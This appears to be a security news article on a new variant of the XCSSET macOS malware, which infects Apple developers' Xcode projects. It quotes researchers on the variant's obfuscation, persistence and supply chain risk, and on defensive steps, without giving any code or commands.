A new variant of the modular macOS malware XCSSET was observed infecting the Xcode projects of Apple developers, creating serious supply chain risks.
Microsoft Threat Intelligence reported March 11 that the first known XCSSET variant since 2022 features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies.
“These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others,” wrote the researchers.
The researchers said this new variant features a modular approach and encoded payloads. It also has improved error handling, and heavily uses scripting languages, Unix commands, and legitimate binaries. These characteristics let the new malware have a low profile on an affected device, making its detection and removal more challenging.
Jaron Bradley, director at Jamf Threat Labs, explained that if an Apple developer uses a repository infected with XCSSET, their product will become infected upon building, creating significant risks to the supply chain. The malware can also spread further to other projects on the developer's system, said Bradley.
“The creators of XCSSET demonstrate a strong understanding of the macOS,” said Bradley. “The original variants, discovered in 2020, exploited three zero-day vulnerabilities to bypass macOS security controls, all of which have since been patched. While the malware has not been updated with new exploits, it has been modified in several ways, including improvements to ensure it runs silently in the background during system startup. The malware code indicates ongoing development, with new capabilities still being added.”
Stephen Kowski, Field CTO at SlashNext Email Security, said that this sophisticated attack targets the software supply chain at its source, potentially compromising apps before they're even built, with the malware's improved obfuscation techniques and multiple persistence methods making it particularly difficult to detect.
“Real-time code scanning and advanced threat detection tools that can identify suspicious behaviors in development environments are essential for protecting against these types of attacks,” said Kowski. “Developers should implement multi-layered security approaches that include continuous monitoring of project files for unexpected changes and strict verification of all code sources before integration.”
Phil Stokes, threat researcher at SentinelOne, added that this new version of XCSSET also targets developers’ GitHub projects and takes some novel approaches to persistence and stealth through poisoning the user’s shell config files, and impersonating and replacing native applications. Stokes said its use of AppleScript largely executed in memory is both characteristic of the XCSSET malware and particularly tricky for traditional AV solutions to detect, since it leaves very little written to disk.
“Developers are reminded that Xcode will typically warn a user when deploying a shared project downloaded from the internet and such projects should not be trusted without careful inspection,” said Stokes. “At this time, we are not seeing the same scale of XCSSET infections as we did with the earlier version and this research is a timely reminder to both organizations and developers to be vigilant."
Microsoft also pointed out in its recent blog that while the researchers have seen limited attacks thus far of the new variant, they wrote the blog to make security teams aware of the issue and offer recommendations so organizations can protect themselves.